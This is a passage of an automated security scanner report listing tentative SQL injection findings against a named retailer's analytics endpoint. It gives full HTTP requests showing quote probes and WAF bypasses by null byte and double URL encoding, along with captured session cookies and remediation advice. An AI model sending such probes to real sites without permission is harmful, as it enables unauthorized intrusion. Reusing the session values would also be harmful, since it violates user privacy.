GET /b/ss/homedepot%00''/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
xserver: www371
Content-Length: 0
Content-Type: text/html


1.40. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12586278942128 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12586278942128

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
Content-Length: 438
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/homedepot/1/H.22.1/s12586278942128 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.41. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12715079787576 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12715079787576

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
xserver: www290
Content-Length: 0
Content-Type: text/html


1.42. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s13481482698842 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s13481482698842

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html


1.43. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1405035742937 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1405035742937

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.44. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14229447680702 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14229447680702

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s14229447680702 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.45. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14671218963339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14671218963339

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; 
s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; 
